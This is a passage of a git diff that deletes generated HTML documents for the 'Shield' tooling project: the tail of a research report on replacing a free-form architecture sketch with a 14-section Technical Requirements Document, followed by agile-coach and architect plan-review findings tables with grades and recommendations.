-<li>No estimate of how many existing feature folders carry <code>plan-architecture.md</code>. Direct-cutover migration risk is asserted &quot;low&quot; but not measured.</li>
-<li>No baseline for current <code>/plan-review</code> defect-catch rate vs. expected post-refactor rate.</li>
-<li>&quot;Future LLD-authoring command&quot; is described but its build effort is not estimated.</li>
-</ul>
-<h3 id="scope-recommendation">Scope Recommendation</h3>
-<p><strong>Essential (MVP — ship in v1 cutover):</strong></p>
-<ol>
-<li><code>/plan</code> emits <code>trd.md</code> with the canonical 14 sections (replaces <code>plan-architecture.md</code>).</li>
-<li>Stable kebab-case section anchors emitted explicitly as <code>{#section-id}</code> markdown anchors.</li>
-<li><code>plan.json</code> story schema gains optional additive <code>design_refs[]</code> with <code>{doc, section_id, anchor_url, label}</code>.</li>
-<li>Schema-validated eval fixture pair (positive + missing-section negatives) under <code>shield/evals/plan-trd.yaml</code>.</li>
-<li><code>/plan-review</code> rules for the 14 required sections (with <code>n/a — &lt;reason&gt;</code> escape) + at least one duplication-detection rule.</li>
-</ol>
-<p><strong>Defer (v2 enhancements):</strong></p>
-<ul>
-<li><code>/lld &lt;component&gt;</code> command — template locked; authoring command is &quot;future&quot;. v1 leaves <code>lld</code> refs as TODO entries.</li>
-<li>Adapter auto-creation of Confluence/Notion pages from <code>design_refs[]</code> — v1 emits URLs only.</li>
-<li>Structured ClickUp/Notion relationships — v1 emits URLs only.</li>
-<li><code>last_aligned_with: &lt;commit-sha&gt;</code> metadata for undead-doc countermeasure.</li>
-<li><code>/lld</code> auto-generated &quot;Referenced By&quot; backlinks.</li>
-<li>Governance failure-mode rules (design-doc theatre, review-rubber-stamp, etc.).</li>
-</ul>
-<p><strong>Cut entirely:</strong></p>
-<ul>
-<li>Lean TRD variant — research locks this as <strong>rejected</strong>. Do not relitigate.</li>
-<li>Migration tool for existing <code>plan-architecture.md</code> — direct cutover, no migration.</li>
-</ul>
-<h3 id="prioritization-framework">Prioritization Framework</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Work item</th>
-<th>Effort</th>
-<th>Impact</th>
-<th>Dependency</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>P0</strong></td>
-<td>Schema-validated TRD eval fixture pair + section slug allow-list</td>
-<td>M</td>
-<td><strong>Very high</strong> — strongest format-drift countermeasure; CLAUDE.md mandate</td>
-<td>Section list locked (done)</td>
-</tr>
-<tr>
-<td><strong>P0</strong></td>
-<td><code>/plan</code> command + <code>plan-docs/SKILL.md</code> updates to emit <code>trd.md</code> with 14 canonical sections, domain-aware prompting per section, and explicit <code>{#section-id}</code> anchors</td>
-<td>L</td>
-<td><strong>Very high</strong> — the actual cutover</td>
-<td>None</td>
-</tr>
-<tr>
-<td><strong>P0</strong></td>
-<td><code>plan.json</code> story schema: additive <code>design_refs[]</code></td>
-<td>S</td>
-<td><strong>High</strong> — story traceability + <code>/implement</code> consumption</td>
-<td>None (additive)</td>
-</tr>
-<tr>
-<td><strong>P1</strong></td>
-<td><code>/plan-review</code> rules for required-section presence + 1 duplication-detection rule</td>
-<td>M</td>
-<td>High — converts free-form review into structured grading</td>
-<td>P0 schema lands first</td>
-</tr>
-<tr>
-<td><strong>P1</strong></td>
-<td><code>/pm-sync</code> adapter handling for <code>design_refs[]</code> URL emission (all four adapters)</td>
-<td>M</td>
-<td>Medium — read-only forward link in v1</td>
-<td><code>design_refs[]</code> shape locked (done)</td>
-</tr>
-<tr>
-<td><strong>P2</strong></td>
-<td><code>last_aligned_with</code> metadata + <code>/implement</code> update on story close</td>
-<td>S</td>
-<td>Medium — undead-doc countermeasure</td>
-<td>After v1 stable</td>
-</tr>
-<tr>
-<td><strong>P2</strong></td>
-<td><code>/plan-review</code> rules for remaining failure-mode countermeasures</td>
-<td>M</td>
-<td>Medium — incremental review quality</td>
-<td>After P1</td>
-</tr>
-<tr>
-<td><strong>P3 (deferred)</strong></td>
-<td><code>/lld &lt;component&gt;</code> command + LLD eval fixtures</td>
-<td>L</td>
-<td>High <em>for LLD consumers</em> — but no LLD consumers exist yet</td>
-<td>After v1, separate epic</td>
-</tr>
-<tr>
-<td><strong>P3 (deferred)</strong></td>
-<td>Adapter auto-creation of design-doc pages</td>
-<td>L</td>
-<td>Low — research recommends URL-only in v1</td>
-<td>After <code>/lld</code></td>
-</tr>
-</tbody>
-</table>
-<p><strong>Sequencing rationale:</strong> P0 items land together in the cutover PR (eval can't ship before generator; generator shouldn't ship without eval). <code>design_refs[]</code> is additive and zero-risk, so it goes in v1 even with no consumer yet — locking the contract early avoids a v2 migration. <code>/lld</code> is genuinely deferrable because the TRD references LLDs by URL with TODO entries until the command exists.</p>
-<h3 id="stakeholder-summary">Stakeholder Summary</h3>
-<p>Shield's <code>/plan</code> command today produces a work breakdown and a free-form architecture sketch (<code>plan-architecture.md</code>). Engineers reading the output have no predictable place to find the system design, and reviewers have no consistent shape to grade against. The research recommends replacing the free-form sketch with a <strong>Technical Requirements Document (TRD)</strong> — a 14-section template grounded in the IEEE software-design standard, mirrored from the reference TRD template, and consistent with how Google, Uber, and respected practitioners (Will Larson, Gergely Orosz) describe modern design-doc practice. The TRD covers the <em>what</em> and the <em>architecture-level how</em> of a feature. The deeper component-internal details (database schemas, API internals, race-condition handling) move to per-component <strong>Low-Level Design (LLD)</strong> documents authored separately when each milestone begins, following a 14-section template Shield already has a working sample for. Every story in the work plan gains an optional pointer to the exact section of the TRD or LLD it depends on, so an engineer picking up a story can find the design in one click. The change ships as a direct replacement with no migration burden — existing feature folders keep their old artifacts and stay readable. The two biggest risks of templated design docs (templates drifting in shape across runs, and the same content being restated in three places that then disagree) are addressed with an automated check that enforces the section list and a written ownership rule of which document owns which content. The first release lands the new TRD output, the schema-enforcing test, and the story-to-design pointers; the LLD command and richer reviewer rules follow in a second release.</p>
-<h3 id="critical-gaps--user-verdict-2026-05-24">Critical gaps — user verdict (2026-05-24)</h3>
-<p>The three Critical-severity findings were reviewed with the requester. All three are acknowledged as artifacts of applying the full PM1–PM11 rubric (designed for PRDs / product features) to an internal-tooling research artifact. Verdict per gap:</p>
-<ol>
-<li><strong>PM1 — Quantified user-impact per persona.</strong> <em>Resolution:</em> the refactor's value is a baseline add to how tech teams currently work — the personas (plan author, reviewer, <code>/implement</code> consumer) all benefit uniformly. No additional quantification needed for an internal tooling change.</li>
-<li><strong>PM2 — Explicit Problem Statement section.</strong> <em>Resolution:</em> not required. Going to implementation directly; the Context paragraph at the top of this doc carries enough framing for engineering work.</li>
-<li><strong>PM10 — Business-value tie-in.</strong> <em>Resolution:</em> the value is to help tech teams iterate faster by automating planning steps that previously required free-form judgment. Not a business-OKR question for an internal Shield meta-tooling refactor.</li>
-</ol>
-<p>PM8 (success metrics) and PM4/PM5 (prioritization rationale, stakeholder communicability) are Important but not blocking — folded into the implementation work where the Prioritization Framework table already addresses sequencing.</p>
-<h2 id="references">References</h2>
-<ul>
-<li>IEEE Std 1016-2009, &quot;Software Design Descriptions.&quot; <a href="https://cengproject.cankaya.edu.tr/wp-content/uploads/sites/10/2017/12/SDD-ieee-1016-2009.pdf">Çankaya University full PDF</a> · <a href="https://ieeexplore.ieee.org/document/5167255">IEEE Xplore</a> · <a href="https://en.wikipedia.org/wiki/Software_design_description">Wikipedia summary</a></li>
-<li>Sommerville, I. (2015). <em>Software Engineering</em>, 10th ed. Pearson. Chapter 6 (Architectural Design) + Chapter 7 (Design and Implementation). <a href="https://www.pearson.com/en-us/subject-catalog/p/software-engineering/P200000003258/9780137503148">Pearson catalog</a></li>
-<li>Pressman, R., &amp; Maxim, B. (2014). <em>Software Engineering: A Practitioner's Approach</em>, 8th ed. McGraw-Hill. Chapters 12–15 (Design Concepts, Architectural Design, Component-Level Design, UI Design). <a href="https://books.google.com/books/about/Software_Engineering_A_Practitioner_s_Ap.html?id=i8NmnAEACAAJ">Google Books</a></li>
-<li>Ubl, M. &quot;Design Docs at Google.&quot; <a href="https://www.industrialempathy.com/posts/design-docs-at-google/">industrialempathy.com</a></li>
-<li>Larson, W. &quot;Writing an engineering strategy.&quot; <a href="https://lethain.com/eng-strategies/">lethain.com/eng-strategies</a> · <em>An Elegant Puzzle: Systems of Engineering Management</em></li>
-<li>Orosz, G. &quot;Companies Using RFCs or Design Docs and Examples of These.&quot; <a href="https://blog.pragmaticengineer.com/rfcs-and-design-docs/">blog.pragmaticengineer.com/rfcs-and-design-docs</a></li>
-<li>Bryar, C., &amp; Carr, B. (2021). <em>Working Backwards: Insights, Stories, and Secrets from Inside Amazon</em>. <a href="https://workingbackwards.com/concepts/working-backwards-pr-faq-process/">workingbackwards.com PR/FAQ summary</a></li>
-<li>Costa, L. &quot;Design docs are dead and we killed them.&quot; <a href="https://www.lucasfcosta.com/blog/design-docs">lucasfcosta.com/blog/design-docs</a></li>
-<li>Turnbull, D. &quot;Throwaway PRs, not design docs.&quot; <a href="https://softwaredoug.com/blog/2024/12/14/throwaway-prs-not-design-docs">softwaredoug.com</a></li>
-<li>Cvet, M. &quot;Goals and Failure Modes for RFCs and Technical Design Documents.&quot; <a href="https://medium.com/better-programming/goals-and-failure-modes-for-rfcs-and-technical-design-documents-c4ee1d1da6ff">Better Programming, Medium, 2020</a></li>
-<li>Squarespace Engineering. &quot;The Power of 'Yes, If'.&quot; <a href="https://engineering.squarespace.com/blog/2019/the-power-of-yes-if">engineering.squarespace.com</a></li>
-<li>Kashitsyn, R. &quot;Effective design docs.&quot; <a href="https://mmapped.blog/posts/31-effective-design-docs">mmapped.blog</a></li>
-<li>McCaffrey, C. &quot;Design docs, markdown, and Git.&quot; <a href="https://caitiem20.wordpress.com/2020/03/29/design-docs-markdown-and-git/">caitiem20.wordpress.com</a></li>
-<li>&quot;Decoding the Dichotomy: PRD vs TRD.&quot; <a href="https://medium.com/@kokoproduct/decoding-the-dichotomy-prd-vs-trd-67463a29aa84">Koko Product, Medium</a></li>
-<li>&quot;How to write a PRD that engineers actually read.&quot; <a href="https://plane.so/blog/how-to-write-a-prd-that-engineers-actually-read">Plane.so blog</a></li>
-<li>Atlassian. &quot;Anchors in Confluence.&quot; <a href="https://confluence.atlassian.com/doc/anchors-139442.html">confluence.atlassian.com/doc/anchors-139442.html</a></li>
-<li>Atlassian. &quot;Configuring issue linking.&quot; <a href="https://confluence.atlassian.com/adminjiraserver/configuring-issue-linking-938847862.html">confluence.atlassian.com/adminjiraserver/configuring-issue-linking-938847862.html</a></li>
-<li>ClickUp. &quot;Intro to Relationships.&quot; <a href="https://help.clickup.com/hc/en-us/articles/6304528030743-Intro-to-Relationships">help.clickup.com/.../6304528030743</a></li>
-<li>Brown, S. &quot;The C4 model for visualising software architecture.&quot; <a href="https://c4model.com/">c4model.com</a></li>
-<li>Notion. &quot;Create links and backlinks.&quot; <a href="https://www.notion.com/help/create-links-and-backlinks">notion.com/help/create-links-and-backlinks</a></li>
-<li>HN thread on design-doc anti-patterns (item 44779428). <a href="https://news.ycombinator.com/item?id=44779428">news.ycombinator.com/item?id=44779428</a></li>
-<li>HN thread on RFC-process cost (item 18145205). <a href="https://news.ycombinator.com/item?id=18145205">news.ycombinator.com/item?id=18145205</a></li>
-<li>HN thread on over-specification (item 46221016). <a href="https://news.ycombinator.com/item?id=46221016">news.ycombinator.com/item?id=46221016</a></li>
-<li>Lobsters discussion on Design Docs at Google. <a href="https://lobste.rs/s/rullsv/design_docs_at_google">lobste.rs/s/rullsv</a></li>
-<li>ADR catalog. <a href="https://adr.github.io/">adr.github.io</a></li>
-</ul>
-<h3 id="internal-references-notion--reference-workspace">Internal references (Notion — reference workspace)</h3>
-<ul>
-<li><a href="https://www.notion.so/29a1ab62faf5805ea7dadefb9d052af0">Reference TRD Template</a> (last edited 2025-11-04)</li>
-<li>Reference LLD example (per-library scope, 2026-05-10)</li>
-<li>Reference HLD example (module-first, 2026-04-15)</li>
-<li>Reference HLD example with &quot;Solutioning&quot; sibling label (2026-04-01)</li>
-<li>Reference HLD example (minimal, small features, 2026-05-21)</li>
-<li>Reference TRD with explicit 5-phase Implementation Plan precedent (2026-01-04)</li>
-</ul>
-<h3 id="internal-references-shield-repo">Internal references (Shield repo)</h3>
-<ul>
-<li><code>docs/shield/agent-behavior-decomposition-20260520/outputs/plan-architecture.html</code> — baseline ADR+HLD hybrid the TRD must improve on</li>
-<li><a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43</a> — <code>docs/superpowers/specs/2026-05-18-lld-sample.html</code> — canonical 14-section LLD sample (Bytebite user-signup); reference structure for the <code>/lld</code> command</li>
-</ul>
-<h2 id="further-exploration">Further Exploration</h2>
-<p><em>Curated for going deeper; NOT cited in body above.</em></p>
-<h3 id="books">Books</h3>
-<ul>
-<li>Bass, L., Clements, P., Kazman, R. (2021). <em>Software Architecture in Practice</em> (4th ed.). The module/component-and-connector/allocation viewtype taxonomy is a cleaner alternative to Pressman's four layers.</li>
-<li>Bryar, C., Carr, B. (2021). <em>Working Backwards.</em> Amazon's PR/FAQ tradition for the PRD-upstream framing.</li>
-<li>Fournier, C. (2017). <em>The Manager's Path.</em> ADRs vs design docs distinction in tech-lead chapters.</li>
-</ul>
-<h3 id="long-form-blogs--articles">Long-form blogs / articles</h3>
-<ul>
-<li>Brown, S. &quot;The C4 model for visualising software architecture.&quot; <a href="https://c4model.com/">c4model.com</a> — quoted in body above; Container/Component levels are the chosen LLD granularity.</li>
-<li>arc42 template. <a href="https://arc42.org/">arc42.org</a> — open-source 12-chapter architecture-doc scaffold widely used in DE/EU teams.</li>
-<li>ThoughtWorks. &quot;Lightweight architecture decision records.&quot; For the &quot;TRD = HLD + ADR&quot; hybrid Shield is gravitating toward.</li>
-</ul>
-<h3 id="videos--talks">Videos / talks</h3>
-<ul>
-<li>Larson, W. on engineering strategy at LeadDev. For the &quot;five design docs → one strategy&quot; pattern.</li>
-</ul>
-<h3 id="courses">Courses</h3>
-<ul>
-<li>(None curated this round — open opportunity.)</li>
-</ul>
-<h3 id="podcasts--podcast-episodes">Podcasts / podcast episodes</h3>
-<ul>
-<li><em>StaffEng Podcast</em> — multiple episodes on design-doc practice with senior+ engineers.</li>
-</ul>
-<h3 id="other">Other</h3>
-<ul>
-<li>Joel Henderson's ADR catalog. <a href="https://adr.github.io/">adr.github.io</a> — patterns for ADRs as supplement to (not replacement of) HLD.</li>
-<li>HashiCorp's public RFC template. Useful comparison point for infra-leaning teams.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
deleted file mode 100644
index fe95f4e3..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
+++ /dev/null
@@ -1,165 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="agile-coach--detailed-findings">Agile Coach — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="agile-coach-review-grade-a-">Agile Coach Review (Grade: A-)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>AC1</td>
-<td>Story sizing</td>
-<td>A</td>
-<td>12 stories across 5 epics, each story is a clear, atomic deliverable. None are multi-week; none are trivial sub-tasks. EPIC-3-S2 is the largest (14 negative fixtures) but is appropriately scoped as one cohesive deliverable.</td>
-</tr>
-<tr>
-<td>AC2</td>
-<td>Story independence</td>
-<td>A-</td>
-<td>M1 stories can largely run in parallel (EPIC-1-S1, EPIC-2-S1, EPIC-3-S1 are independent docs/schema/fixture tasks). EPIC-1-S2 depends implicitly on EPIC-1-S1's slug allow-list; EPIC-2-S2 depends on EPIC-2-S1; EPIC-3-S2 depends on EPIC-3-S1's positive fixture. These intra-milestone deps could be explicit but are inferable from content.</td>
-</tr>
-<tr>
-<td>AC3</td>
-<td>Dependency ordering</td>
-<td>A</td>
-<td>Milestones have an explicit DAG: <code>M1 → M2 → M3</code> via <code>depends_on</code> in <code>sidecar.milestones[]</code>. No cycles. EPIC-3-S3 explicitly orders RED before GREEN. Story sequencing within M1 is logical (template → emit → re-run guard; schema → populate; fixtures → wire).</td>
-</tr>
-<tr>
-<td>AC4</td>
-<td>Context completeness</td>
-<td>A</td>
-<td>Every story has a &quot;why&quot; paragraph in <code>description</code>. Examples: EPIC-2-S1 explains &quot;preserve back-compat (missing field is ignored)&quot;; EPIC-5-S1 explains &quot;Countermeasure for undead-doc drift&quot;; EPIC-1-S3 explains the deterministic re-run policy and &quot;no migration.&quot;</td>
-</tr>
-<tr>
-<td>AC5</td>
-<td>Requirements clarity</td>
-<td>A</td>
-<td>Requirements are specific and measurable. Examples: &quot;exactly 14 entries&quot; in slug list (EPIC-1-S1 AC2), &quot;40-char hex sha&quot; (EPIC-5-S1 AC2), &quot;&gt; 80 characters of consecutive verbatim overlap&quot; (EPIC-4-S2 task), &quot;&gt;20-line code block&quot; threshold (EPIC-5-S2).</td>
-</tr>
-<tr>
-<td>AC6</td>
-<td>Implementation step quality</td>
-<td>A-</td>
-<td>Tasks cite exact files, exact field names, and exact thresholds. Minor gap: EPIC-4-S3 says &quot;Update the relevant adapter logic&quot; without naming the adapter files for each tool (just the directory).</td>
-</tr>
-<tr>
-<td>AC7</td>
-<td>Acceptance criteria testability</td>
-<td>A</td>
-<td>Every AC is testable. Examples: &quot;exit code 0&quot; (EPIC-3-S1), &quot;reports that section by slug as a Critical finding&quot; (EPIC-4-S1), &quot;40-char hex sha&quot; (EPIC-5-S1). No vagueness.</td>
-</tr>
-<tr>
-<td>AC8</td>
-<td>Sprint-readiness</td>
-<td>A</td>
-<td>Each story declares <code>&quot;status&quot;: &quot;ready&quot;</code>. File paths, schemas, thresholds, and named errors are all pre-decided. A developer could pick up any story without a planning meeting.</td>
-</tr>
-<tr>
-<td>AC9</td>
-<td>Estimation feasibility</td>
-<td>A-</td>
-<td>Detail is sufficient for confident estimation. EPIC-3-S2 (14 missing-section fixtures + drift + vague-TBD) is the largest unit of work and could be split for tighter sizing.</td>
-</tr>
-<tr>
-<td>AC10</td>
-<td>Definition of Done alignment</td>
-<td>B+</td>
-<td>DoD is implied: code change + eval fixture + RED→GREEN paper trail (CLAUDE.md mandate). No explicit mention of code review, deploy-to-staging, or user-facing CHANGELOG.</td>
-</tr>
-<tr>
-<td>AC13</td>
-<td>Milestone coverage</td>
-<td>A</td>
-<td>Every milestone has covering stories: M1 = 8, M2 = 3, M3 = 2. No milestone is empty.</td>
-</tr>
-<tr>
-<td>AC14</td>
-<td>Milestone reference integrity</td>
-<td>A</td>
-<td>Every story's <code>milestone_id</code> is <code>M1</code>, <code>M2</code>, or <code>M3</code> — all match <code>sidecar.milestones[].id</code>. No dangling references.</td>
-</tr>
-<tr>
-<td>AC15</td>
-<td>Milestone exit criteria testability</td>
-<td>A</td>
-<td>All exit criteria are testable.</td>
-</tr>
-<tr>
-<td>AC16</td>
-<td>Milestone DAG integrity</td>
-<td>A</td>
-<td>DAG is <code>M1 → M2 → M3</code>. Linear chain, no cycles.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> Sprint-ready plan — every story has crisp file targets, exact thresholds, named errors, and testable ACs; the milestone DAG and reference integrity are clean; the only meaningful gap is that the largest story (EPIC-3-S2) could be split for finer estimation, and DoD's code-review/changelog rituals are implicit.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P2</td>
-<td>AC9</td>
-<td>Split EPIC-3-S2 into two stories: (a) &quot;Build negative-fixture generator + 14 missing-section fixtures&quot; and (b) &quot;Author drift-by-addition + vague-TBD fixtures.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC6</td>
-<td>In EPIC-4-S3, name the adapter file per tool instead of &quot;Update the relevant adapter logic.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC10</td>
-<td>Add one cross-cutting AC requiring a CHANGELOG entry / migration note documenting the cutover.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC2</td>
-<td>Make intra-milestone story ordering explicit (e.g., EPIC-1-S2 depends on EPIC-1-S1 slug list; EPIC-3-S2 depends on EPIC-3-S1 positive fixture).</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
deleted file mode 100644
index 3d281ad2..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
+++ /dev/null
@@ -1,149 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="architect--detailed-findings">Architect — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="architect-review-grade-b">Architect Review (Grade: B)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>CA1</td>
-<td>Artifact/component topology</td>
-<td>A</td>
-<td>The artifact graph is well-formed: <code>research.md</code> → <code>trd.md</code> (14 sections w/ stable kebab anchors) → <code>plan.json</code> (stories with <code>design_refs[]</code> pointing at TRD anchors) → <code>/pm-sync</code> adapters → PM tools. Anchor scheme (<code>{#section-id}</code>) is explicitly defined as the join key. EPIC-1-S1 publishes the slug allow-list as a machine-readable sidecar under <code>shield/schema/</code> so eval/review/generator all import from the same source — single source of truth.</td>
-</tr>
-<tr>
-<td>CA2</td>
-<td>Schema/template growth</td>
-<td>B</td>
-<td>Schema evolution path is explicit: 1.1 → 1.2 (<code>design_refs[]</code>) → 1.3 (<code>last_aligned_with</code>), each additive. Gap: the plan does not specify what happens when the 14-section list itself needs to evolve. A <code>template_version</code> field on TRD frontmatter would close this.</td>
-</tr>
-<tr>
-<td>CA3</td>
-<td>Backward compatibility</td>
-<td>A</td>
-<td>Backward compatibility is rigorously asserted across every schema change. Adapters without link affordance log and continue gracefully. Old <code>plan-architecture.md</code> files explicitly preserved.</td>
-</tr>
-<tr>
-<td>CA4</td>
-<td>Cross-tool / cross-domain reach</td>
-<td>B</td>
-<td>Multi-tool reach well covered. Multi-domain reach is headline (one TRD, two domains). Gap: &quot;Mixed → annotate per section&quot; is a single sentence with no worked example or fixture. A monorepo with both <code>*.tf</code> and <code>pyproject.toml</code> is realistic and the plan punts. No mixed-domain positive fixture in EPIC-3-S1.</td>
-</tr>
-<tr>
-<td>CA5</td>
-<td>Contract/interface design across components</td>
-<td>A</td>
-<td>Contract surfaces are tight: <code>design_refs[]</code> shape fully defined; section anchors use explicit <code>{#section-id}</code> kebab-case; slug allow-list machine-readable; LLD placeholder shape precisely specified. Forward-looking contract that lets <code>/lld</code> resolve TODOs later without schema change.</td>
-</tr>
-<tr>
-<td>CA6</td>
-<td>Blast radius / failure-mode isolation</td>
-<td>B</td>
-<td>Several failure modes explicitly handled and isolated (re-run safety, PM-sync degraded mode, eval gates cutover, undead-doc drift countered). Gaps: (a) stale <code>design_refs[].anchor_url</code> when section renamed/deleted between runs — <code>/plan-review</code> has no detection; (b) <code>last_aligned_with</code> race when working tree is dirty; (c) eval fixture set falling out of sync with live slug allow-list.</td>
-</tr>
-<tr>
-<td>CA7</td>
-<td>Mechanism choice for each concern</td>
-<td>B</td>
-<td>Mostly well-reasoned (markdown anchors, eval-as-enforcement, additive schema growth, substring-overlap for duplication detection). Concerns: (a) EPIC-4-S2 &quot;&gt; 80 characters&quot; magic number undefended; (b) EPIC-5-S2 &quot;&gt;20 lines&quot; same; (c) <code>last_aligned_with</code> records commit SHA but doesn't capture whether the TRD itself has changed since that SHA — a <code>trd_sha</code> content hash would catch post-commit edits.</td>
-</tr>
-<tr>
-<td>CA8</td>
-<td>Positive ↔ negative fixture parity &amp; template ↔ eval ↔ review consistency</td>
-<td>B</td>
-<td>Parity mostly enforced. 14 missing-section negatives derived from positive by removing one — right pattern. Slug allow-list imported by generator + eval + review. Gaps: (a) no round-trip integration eval (<code>/plan</code> output → <code>/plan-review</code> says no Criticals); (b) no positive fixture for mixed-domain or LLD-TODO placeholder shape; (c) <strong>EPIC-3-S3 AC says &quot;13 negatives&quot; — actual count is 14 missing-section + 1 drift + 1 vague-TBD = 16. Off-by-N inconsistency between AC text and fixture inventory in EPIC-3-S2</strong>.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The plan has unusually rigorous artifact-topology design but leaks credibility through small inconsistencies — <code>plan-architecture.md</code> still says &quot;13-section&quot; at lines 25, 37, 75; EPIC-3-S3 says &quot;13 negatives&quot; when EPIC-3-S2 enumerates 16; the mixed-domain path is asserted (&quot;Mixed → annotate per section&quot;) without a worked example or fixture. Headline architectural choices are sound; gaps are in edge-case completeness.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>CA8</td>
-<td>Fix the negative-fixture count inconsistency. <code>plan.md</code> EPIC-3-S3 AC says &quot;all 13 negatives fail&quot; but EPIC-3-S2 enumerates 16. Pick a number and propagate.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>CA8</td>
-<td>Fix the stale &quot;13-section&quot; references in <code>plan-architecture.md</code> (lines 25, 37, 75). Reconcile to 14 everywhere.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>CA4</td>
-<td>Add a worked example and at least one eval fixture for the mixed-domain case: (a) <code>positive-mixed/</code> fixture, (b) explicit guidance in plan-docs/SKILL.md, (c) detection rule for mixed (both infra and backend markers).</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>CA6</td>
-<td>Specify stale-anchor detection. Add an AC to EPIC-4-S1: &quot;/plan-review reports any <code>design_refs[].anchor_url</code> whose <code>#section-id</code> is not present in the linked trd.md as a Critical finding.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA7</td>
-<td>Defend or parameterize the magic numbers (&gt;80 char overlap, &gt;20 line code block).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA7</td>
